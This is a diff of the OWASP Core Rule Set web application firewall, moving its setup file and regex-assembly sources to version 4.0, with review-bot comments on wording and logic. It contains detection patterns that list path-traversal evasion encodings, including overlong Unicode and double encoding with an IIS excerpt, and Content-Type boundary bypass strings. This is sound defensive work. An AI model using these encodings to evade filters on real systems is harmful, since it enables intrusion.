+# +# /proxy/ +# Blocking this prevents the 'httpoxy' vulnerability: https://httpoxy.org +# +# /lock-token/ +# +# /content-range/ +# +# /if/ +# +# /x-http-method-override/ +# /x-http-method/ +# /x-method-override/ +# Blocking these headers prevents method override attacks, as described here: +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# # Uncomment this rule to change the default. #SecAction \ -# "id:900250,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'" - -# File extensions considered static files. -# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. -# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". -# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# "id:900250,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" +# +# [ Extended ] +# Includes deprecated headers that are still in use (so false positives are +# possible) and headers with possible security risks. Forbidden at a higher +# paranoia level. +# Default: /accept-charset/ +# +# /accept-charset/ +# Deprecated header that should not be used by clients and should be ignored +# by servers. Can be used for a response WAF bypass by asking for a charset +# that the WAF cannot decode. Considered to be a good indicator of suspicious +# behavior but produces too many false positives to be forbidden by default. +# References: +# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# https://github.com/coreruleset/coreruleset/issues/3140 +# # Uncomment this rule to change the default. 
#SecAction \ -# "id:900260,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" +# "id:900255,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_headers_extended=/accept-charset/'" # Content-Types charsets that a client is allowed to send in a request. -# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# The content-types are enclosed by |pipes| as delimiters to guarantee exact matches. +# Default: |utf-8| |iso-8859-1| |iso-8859-15| |windows-1252| # Uncomment this rule to change the default. -# Use "|" to separate multiple charsets like in the rule defining -# tx.allowed_request_content_type. #SecAction \ -# "id:900280,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" +# "id:900280,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # # -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- 
@@ -480,80 +619,82 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # Block request if number of arguments is too high
 # Default: unlimited
 # Example: 255
+# Note that a hard limit by the engine may also apply here (SecArgumentsLimit).
+# This would override this soft limit.
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900300,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.max_num_args=255"
+# "id:900300,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.max_num_args=255"
 
 # Block request if the length of any argument name is too high
 # Default: unlimited
 # Example: 100
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900310,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.arg_name_length=100"
+# "id:900310,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.arg_name_length=100"
 
 # Block request if the length of any argument value is too high
 # Default: unlimited
 # Example: 400
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900320,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.arg_length=400"
+# "id:900320,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.arg_length=400"
 
 # Block request if the total length of all combined arguments is too high
 # Default: unlimited
 # Example: 64000
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900330,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.total_arg_length=64000"
+# "id:900330,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.total_arg_length=64000"
 
 # Block request if the file size of any individual uploaded file is too high
 # Default: unlimited
 # Example: 1048576
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900340,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.max_file_size=1048576"
+# "id:900340,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.max_file_size=1048576"
 
 # Block request if the total size of all combined uploaded files is too high
 # Default: unlimited
 # Example: 1048576
 # Uncomment this rule to set a limit.
 #SecAction \
-# "id:900350,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.combined_file_sizes=1048576"
+# "id:900350,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.combined_file_sizes=1048576"
 
 
 #
 # -- [[ Easing In / Sampling Percentage ]] -------------------------------------
 #
-# Adding the Core Rule Set to an existing productive site can lead to false
+# Adding the CRS to an existing productive site can lead to false
 # positives, unexpected performance issues and other undesired side effects.
 #
 # It can be beneficial to test the water first by enabling the CRS for a
@@ -572,7 +713,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # following directive somewhere after the inclusion of the CRS
 # (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf).
 #
-# SecRuleUpdateActionById 901150 "nolog"
+#SecRuleUpdateActionById 901450 "nolog"
 #
 # ATTENTION: If this TX.sampling_percentage is below 100, then some of the
 # requests will bypass the Core Rules completely and you lose the ability to
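Review bot: The note added above rule 900300, `This would override this soft limit.`, does not say in which direction the two limits interact, so an operator cannot tell whether tx.max_num_args has to sit below or above SecArgumentsLimit. As I understand the engine directive, argument parsing stops once SecArgumentsLimit is reached, so a tx.max_num_args above it can never trigger and the engine's own handling applies instead; please confirm against the ModSecurity reference before wording it. Suggest replacing the two added lines with `# Note: the engine's SecArgumentsLimit is a hard limit applied before this rule runs; a tx.max_num_args above it never triggers, so keep this value at or below SecArgumentsLimit.`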
@@ -580,148 +721,14 @@ SecDefaultAction "phase:2,log,auditlog,pass" # # Uncomment this rule to enable this feature: # -#SecAction "id:900400,\ -# phase:1,\ -# pass,\ -# nolog,\ -# setvar:tx.sampling_percentage=100" - - -# -# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ -# -# Optionally, you can check the client IP address against the Project Honey Pot -# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a -# free API key. Set it here with SecHttpBlKey. -# -# Project Honeypot returns multiple different malicious IP types. -# You may specify which you want to block by enabling or disabling them below. -# -# Ref: https://www.projecthoneypot.org/httpbl.php -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey -# -# Uncomment these rules to use this feature: -# -#SecHttpBlKey XXXXXXXXXXXXXXXXX -#SecAction "id:900500,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.block_search_ip=1,\ -# setvar:tx.block_suspicious_ip=1,\ -# setvar:tx.block_harvester_ip=1,\ -# setvar:tx.block_spammer_ip=1" - - -# -# -- [[ GeoIP Database ]] ------------------------------------------------------ -# -# There are some rulesets that inspect geolocation data of the client IP address -# (geoLookup). The CRS uses geoLookup to implement optional country blocking. -# -# To use geolocation, we make use of the MaxMind GeoIP database. -# This database is not included with the CRS and must be downloaded. -# -# There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), -# and ModSecurity v3 uses GeoLite2 (.mmdb files). -# -# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, -# see https://github.com/maxmind/geoipupdate. -# -# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ -# for configuration options. 
-# -# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. -# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. -# -# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files -# from CSV files first. -# -# You can achieve this using https://github.com/sherpya/geolite2legacy -# Pick the zip files from maxmind site: -# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip -# -# Follow the guidelines for installing the tool and run: -# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ -# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat -# -# Update the database regularly, see Step 3 of the configuration link above. -# -# By default, when you execute `sudo geoipupdate` on Linux, files from the free database -# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). -# -# Then choose from: -# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) -# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) -# -# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html -# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html -# -# Uncomment only one of the next rules here to use this feature. -# Choose the one depending on the ModSecurity version you are using, and change the path accordingly: -# -# For ModSecurity v3: -#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb -# For ModSecurity v2 (points to the converted one): -#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat - -# -# -=[ Block Countries ]=- -# -# Rules in the IP Reputation file can check the client against a list of high -# risk country codes. 
These countries have to be defined in the variable -# tx.high_risk_country_codes via their ISO 3166 two-letter country code: -# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements -# -# If you are sure that you are not getting any legitimate requests from a given -# country, then you can disable all access from that country via this variable. -# The rule performing the test has the rule id 910100. -# -# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be -# downloaded (see the section "GeoIP Database" above.) -# -# By default, the list is empty. A list used by some sites was the following: -# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" -# -# Uncomment this rule to use this feature: -# #SecAction \ -# "id:900600,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.high_risk_country_codes='" +# "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" -# -# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ -# -# Optional DoS protection against clients making requests too quickly. -# -# When a client is making more than 100 requests (excluding static files) within -# 60 seconds, this is considered a 'burst'. After two bursts, the client is -# blocked for 600 seconds. -# -# Requests to static files are not counted towards DoS; they are listed in the -# 'tx.static_extensions' setting, which you can change in this file (see -# section "HTTP Policy Settings"). -# -# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. -# -# Uncomment this rule to use this feature: -# -#SecAction \ -# "id:900700,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.dos_burst_time_slice=60',\ -# setvar:'tx.dos_counter_threshold=100',\ -# setvar:'tx.dos_block_timeout=600'" - # # -- [[ Check UTF-8 encoding ]] ------------------------------------------------ 
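Review bot: The sections removed here (Project Honey Pot 900500, GeoIP database, country blocking 900600, DoS protection 900700, plus the static-extensions setting 900260 in the earlier hunk) leave no pointer to where these settings now live, so an operator who carries a 3.3 crs-setup.conf forward will keep setting tx.high_risk_country_codes, tx.dos_* and tx.static_extensions with, presumably, no rule left in the core set to read them and no warning that they are dead. The only hint in this commit is the new plugins/README.md, which the setup file never references. Suggest a short stub at the point of removal, e.g. `# -- [[ Moved to plugins ]] -- Project Honey Pot, GeoIP / country blocking and DoS protection are no longer part of the core rules; see plugins/README.md and https://github.com/coreruleset/plugin-registry.` The plugin move itself is inferred from the plugins/ files added in this commit.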
@@ -733,80 +740,12 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to use this feature: # #SecAction \ -# "id:900950,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.crs_validate_utf8_encoding=1" - - -# -# -- [[ Blocking Based on IP Reputation ]] ------------------------------------ -# -# Blocking based on reputation is permanent in the CRS. Unlike other rules, -# which look at the individual request, the blocking of IPs is based on -# a persistent record in the IP collection, which remains active for a -# certain amount of time. -# -# There are two ways an individual client can become flagged for blocking: -# - External information (RBL, GeoIP, etc.) -# - Internal information (Core Rules) -# -# The record in the IP collection carries a flag, which tags requests from -# individual clients with a flag named IP.reput_block_flag. -# But the flag alone is not enough to have a client blocked. There is also -# a global switch named tx.do_reput_block. This is off by default. If you set -# it to 1 (=On), requests from clients with the IP.reput_block_flag will -# be blocked for a certain duration. -# -# Variables -# ip.reput_block_flag Blocking flag for the IP collection record -# ip.reput_block_reason Reason (= rule message) that caused to blocking flag -# tx.do_reput_block Switch deciding if we really block based on flag -# tx.reput_block_duration Setting to define the duration of a block -# -# It may be important to know, that all the other core rules are skipped for -# requests, when it is clear that they carry the blocking flag in question. 
-# -# Uncomment this rule to use this feature: -# -#SecAction \ -# "id:900960,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.do_reput_block=1" -# -# Uncomment this rule to change the blocking time: -# Default: 300 (5 minutes) -# -#SecAction \ -# "id:900970,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.reput_block_duration=300" - - -# -# -- [[ Collection timeout ]] -------------------------------------------------- -# -# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) -# to a lower setting which is appropriate to most sites. -# This increases performance by cleaning out stale collection (block) entries. -# -# This value should be greater than or equal to: -# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and -# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). -# -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout - -# Please keep this directive uncommented. -# Default: 600 (10 minutes) -SecCollectionTimeout 600 +# "id:900950,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.crs_validate_utf8_encoding=1" # @@ -821,9 +760,9 @@ SecCollectionTimeout 600 # E.g., v3.0.0 is represented as 300. # SecAction \ - "id:900990,\ - phase:1,\ - nolog,\ - pass,\ - t:none,\ - setvar:tx.crs_setup_version=330" + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=400" diff --git a/docs/OWASP-CRS-Documentation b/docs/OWASP-CRS-Documentation index df39d826fe..9038febc90 160000 --- a/docs/OWASP-CRS-Documentation +++ b/docs/OWASP-CRS-Documentation @@ -1 +1 @@ -Subproject commit df39d826fe43081c00499ba3094276c735d1883b +Subproject commit 9038febc90bac8a7d769194f0645a636ad64856b diff --git a/docs/README b/docs/README index 281651e7ee..aa961033fc 100644 --- a/docs/README +++ b/docs/README 
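Review bot: Removing `SecCollectionTimeout 600` drops the only place the setup file set the collection timeout, so installations fall back to the ModSecurity default, which the removed comment itself gives as 1 hour; stale IP-collection entries therefore live six times longer, and the removed guidance that the value must be >= tx.dos_block_timeout / tx.reput_block_duration disappears together with the features that needed it. If those features moved to plugins (inferred from the plugins/ files in this commit), a plugin that uses the IP collection still depends on this directive and nothing in the core setup documents that any more. Suggest keeping a comment where the directive was, e.g. `# SecCollectionTimeout is no longer set here. Plugins that use persistent collections (DoS protection, IP reputation) need a value >= their block duration; see the plugin's documentation.`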
@@ -1,8 +1,17 @@ Welcome to the OWASP Core Rule Set (CRS) documentation. -The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository. + +The latest version of the documentation can be read at: +https://coreruleset.org/docs/ + +The OWASP CRS documentation is generated by Hugo and is stored +in a separate Github repository: +https://github.com/coreruleset/documentation/ + +While the documentation is available as part of the CRS project, +it is provided in the form of a Git submodule. Using a Git +submodule allows us to update the documentation without making +changes to the main rule repository. You can download the documentation using git: - $ git submodule init - $ git submodule update - -Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/ + + git submodule update --init docs diff --git a/plugins/README.md b/plugins/README.md new file mode 100644 index 0000000000..4c2cc9d4f4 --- /dev/null +++ b/plugins/README.md @@ -0,0 +1,7 @@ +This is the folder where you install CRS plugins. + +See https://github.com/coreruleset/plugin-registry +for a list of registered official and 3rd party plugins. + +Plugins are documented in the CRS INSTALL file and +in also with said plugin registry. diff --git a/plugins/empty-after.conf b/plugins/empty-after.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/plugins/empty-before.conf b/plugins/empty-before.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/plugins/empty-config.conf b/plugins/empty-config.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/regex-assembly/920100.ra b/regex-assembly/920100.ra new file mode 100644 index 0000000000..aafa286883 
--- /dev/null +++ b/regex-assembly/920100.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Cover the GET method +##! | Path |--- Query ---| Fragment | +^get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?$ + +##! Cover the CONNECT method +##! Meth |----- IPv4 Address ------|- Port -| Protocol | +^connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?\s+[\w\./]+$ + +##! Meth |- Host --|Prt| Protocol | +^connect [\w\-\./]+:\d+\s+[\w\./]+$ + +##! Cover the OPTIONS method +##! Meth |*| Protocol | +^options \*\s+[\w\./]+$ + +##! Cover other methods of the form METHOD [[scheme]://[host][:port]]/path[?query][#fragment] protocol +##! Method ---|- Scheme:// -|- Host --|-- Port --| Path |--- Query ---| Fragment | Protocol | +^[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?\s+[\w\./]+$ diff --git a/regex-assembly/920120.ra b/regex-assembly/920120.ra new file mode 100644 index 0000000000..ef67c2e860 --- /dev/null +++ b/regex-assembly/920120.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The HTML entities included in the expression are a best guess selection of frequently +##! used entities. Including too many would further reduce the performance of the expression +##! but there may well be additional entities that would make sense to add to the list. +##! The official list of entities is hosted by the WHATWG: +##! https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references + +##!+ i + +##!^ ^ +##!$ *$ + +&[aeiouclnrszg]acute; +&[cdelnrstz]caron; +&[cgklnrst]cedil; +&[aeioucghjswy]circ; +&[aeiou]grave; +&[au]ring; +&[anoi]tilde; +&[aeiouy]uml; +& +' +  +ø +[^'\";=] diff --git a/regex-assembly/920220-chain1.ra b/regex-assembly/920220-chain1.ra new file mode 100644 index 0000000000..b53f964c31 --- /dev/null +++ b/regex-assembly/920220-chain1.ra 
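Review bot: The GET expression `^get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?$` is the only one with no trailing `\s+[\w\./]+$` protocol part, and the comment column header above it simply omits a Protocol column without saying why, so the next editor may "fix" it to match the other methods. Because the path class `[^?#]*` also matches whitespace, this alternative accepts both a version-less request line and any trailing text after the path, i.e. the protocol token is effectively not validated for GET at all. If the intent is to accept the HTTP/0.9 simple-request form (my reading), say so in a comment such as `##! GET has no protocol column on purpose: the HTTP/0.9 simple request form has no version token, and [^?#]* also swallows anything after the path`; if not, the other methods' `\s+[\w\./]+$` tail belongs here too.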
@@ -0,0 +1,15 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+
+##!^ ^
+##!$ $
+
+##! grab the path, except for the lat path segment (separate rule)
+(.*)/
+##!=>
+##! skip the last path segment, if there is one (non-capturing group)
+(?:[^?]+)?
+##!=>
+##! grab the query string, if there is one
+(\?.*)?
diff --git a/regex-assembly/920221.ra b/regex-assembly/920221.ra
new file mode 100644
index 0000000000..47184249d4
--- /dev/null
+++ b/regex-assembly/920221.ra
@@ -0,0 +1,12 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+
+##!^ ^
+##!$ $
+
+##! find any percent character
+.*%.*
+##!=>
+##! followed by something that looks like a file extension
+\.[^\s.]+
diff --git a/regex-assembly/920260.ra b/regex-assembly/920260.ra
new file mode 100644
index 0000000000..8bfd4a41cb
--- /dev/null
+++ b/regex-assembly/920260.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+%uff[0-9a-f]{2}
diff --git a/regex-assembly/920521.ra b/regex-assembly/920521.ra
new file mode 100644
index 0000000000..ac81329b1f
--- /dev/null
+++ b/regex-assembly/920521.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Current Accept-Encoding headers
+br
+compress
+deflate
+gzip
+identity
+\*
+^$
+##! Deprecated Accept-Encoding headers
+aes128gcm
+exi
+pack200-gzip
+zstd
+x-compress
+x-gzip
diff --git a/regex-assembly/920600.ra b/regex-assembly/920600.ra
new file mode 100644
index 0000000000..cdc7303ba4
--- /dev/null
+++ b/regex-assembly/920600.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!> include charset-specification
diff --git a/regex-assembly/921421.ra b/regex-assembly/921421.ra
new file mode 100644
index 0000000000..f796caecbd
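Review bot: The comment above the first expression in 920220-chain1.ra has a typo, `lat path segment` for `last path segment`, which is worth fixing because the next comment says "skip the last path segment" and a reader cannot tell whether the two refer to the same thing. Suggest `##! grab the path, except for the last path segment (separate rule)`.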
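Review bot: In 920521.ra the second group is headed `##! Deprecated Accept-Encoding headers`, but `zstd` (RFC 8878) and `aes128gcm` (RFC 8188) are current IANA-registered content codings, not deprecated ones, and none of the entries are headers: they are coding tokens carried in the Accept-Encoding header. Both groups end up in one alternation, so the split only affects readers, but a wrong label will mislead whoever next prunes the list. Suggest `##! Common content codings` and `##! Registered but less common (or legacy x-) content codings` for the two headings, ideally with a pointer to the IANA HTTP Content Coding Registry.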
--- /dev/null
+++ b/regex-assembly/921421.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json"
+##! Find Content-Type: application/soap+xml;boundary="application/json"
+^[^;\s,]+[;\s,].*?application\/json
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json"
+##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json"
+^[^;\s,]+[;\s,].*?application\/.+[+]json
+
+##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml"
+##! Find Content-Type: application/json;boundary="application/soap+xml"
+^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml
diff --git a/regex-assembly/921422.ra b/regex-assembly/921422.ra
new file mode 100644
index 0000000000..5b70a56160
--- /dev/null
+++ b/regex-assembly/921422.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Attacks attempting to bypass content-type restrictions or behaviour
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data"
+##! Find Content-Type: application/soap-xml;boundary="multipart/form-data"
+^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b
+^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b
+^[^;\s,]+[;\s,].*?\b(\/|\+)\b
diff --git a/regex-assembly/922110-chain1.ra b/regex-assembly/922110-chain1.ra
new file mode 100644
index 0000000000..cdc7303ba4
--- /dev/null
+++ b/regex-assembly/922110-chain1.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!> include charset-specification
diff --git a/regex-assembly/930100.ra b/regex-assembly/930100.ra
new file mode 100644
index 0000000000..769c9faebf
--- /dev/null
+++ b/regex-assembly/930100.ra
@@ -0,0 +1,110 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Source: https://github.com/wireghoul/dotdotpwn/blob/master/DotDotPwn/TraversalEngine.pm +##! Attack description: https://doc.lagout.org/security/McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf +##! Excerpt: +##! In short, IIS turns %c0%af into +##! the ASCII / character, but parses it at a point where security checks for +##! ‘../’ traversals have already occurred! +##! What has really happened? The attack uses an overlong Unicode +##! representation for a forward or backward slash (/ or \). +##! Unicode permits multibyte encoding of the same character. +##! The fundamental representation can be referred to as a one (character) to one (byte field) +##! representation. The overlong representation is a one (character) to many +##! (bytes) version. +##! Two more valid strings that represent the backward slash are %c1%1c +##! and %c1%9c. The difference between these two hex values is 128. More +##! valid slash representations boil down to a matter of math. For example, +##! %c0%9v works even though %9v isn’t a hexadecimal value. Try adding +##! the value for “9” (57) to “v” (118); if the result is greater than 127, then +##! subtract 128—hint, the final result should be 47. + +##!+ i + +##! slash patterns +##!> assemble + \x5c + ##! URI encoded + %2f + %5c + ##! Hex encoded + 0x2f + 0x5c + ##! Double URI encoded + %252f + %255c + ##! Overlong Unicode sequences (target IIS) + %c0%2f + %c0%af + %c0%5c + %c1%9c + %c1%pc + %c0%9v + %c0%qf + %c1%8s + %c1%1c + %c1%af + %bg%qf + ##! Unicode 16 "alternative" glyphs + %u2215 + %u2216 + ##! Unknown + %uEFC8 + %uF025 + ##! More double encoding and variations on the above + %%32%%66 + %%35%%63 + %e0%80%af + %25c1%259c + %25c0%25af + %f0%80%80%af + %f8%80%80%80%af + %2%46 + %%32%46 + %%32F + %u002f + %1u + / + ##!=< slashes + ##!=> slashes + + ##! dot patterns + ##! 
These use the same techniques as for slashes to evade the detection of '.' + \. + \.%00 + \.%01 + \.\? + \?\. + \? + %2e + 0x2e + %c0\. + %252e + %c0%2e + %c0%ae + %c0%5e + %c0%ee + %c0%fe + %uff0e + %%32%%65 + %e0%80%ae + %25c0%25ae + %f0%80%80%ae + %f8%80%80%80%ae + %fc%80%80%80%80%ae + %2%45 + %u002e + %uff0e + %u2024 + %%32%45 + %%32E + %c0%6e + ##!=> + + ##! Append {2,3} to the result, as we're looking for two or three dots (e.g. /../, /.../) + {2,3} + ##!=> + + ##!=> slashes +##!< diff --git a/regex-assembly/931130.ra b/regex-assembly/931130.ra new file mode 100644 index 0000000000..558f5da468 --- /dev/null +++ b/regex-assembly/931130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931130.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/regex-assembly/931131.ra b/regex-assembly/931131.ra new file mode 100644 index 0000000000..aef8b0ee84 --- /dev/null +++ b/regex-assembly/931131.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931129.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/regex-assembly/932125.ra b/regex-assembly/932125.ra new file mode 100644 index 0000000000..2a69987a10 --- /dev/null +++ b/regex-assembly/932125.ra 
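Review bot: The dot section of 930100.ra lists `\?` on its own (next to `\.\?` and `\?\.`) as a stand-in for a dot, but the comment only says the entries "use the same techniques as for slashes", which does not explain why a bare question mark counts; with the `{2,3}` suffix that is appended afterwards, two or three `?` characters between slash alternatives match as a traversal. If these entries are carried over from the dotdotpwn engine cited at the top of the file (my reading), one line saying so would stop the next editor from dropping them as noise, e.g. `##! bare '?' and '?.'/'.?' come from the dotdotpwn traversal list; kept deliberately`. The `##! Unknown` heading over `%uEFC8` and `%uF025` deserves the same treatment, since "Unknown" tells a maintainer nothing about whether the entries are safe to remove.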
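Review bot: The header comment in 931131.ra says `931129.data and 931131.data are meant to be kept in sync`, while 931130.ra says 931130 and 931131, and both comments use the old `.data` names rather than the `.ra` files this commit creates, so the cross-reference is wrong in one file and stale in both. Since the two assemblies are identical, the sync could be enforced rather than documented: keep the body in 931130.ra and reduce 931131.ra to `##!> include 931130`, exactly as this commit already does for 932131.ra. If there is a reason the two must stay separate copies, correct the comment in 931131.ra to `##! ATTENTION: The rule files 931130.ra and 931131.ra are meant to be kept in sync.` and update the matching line in 931130.ra.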
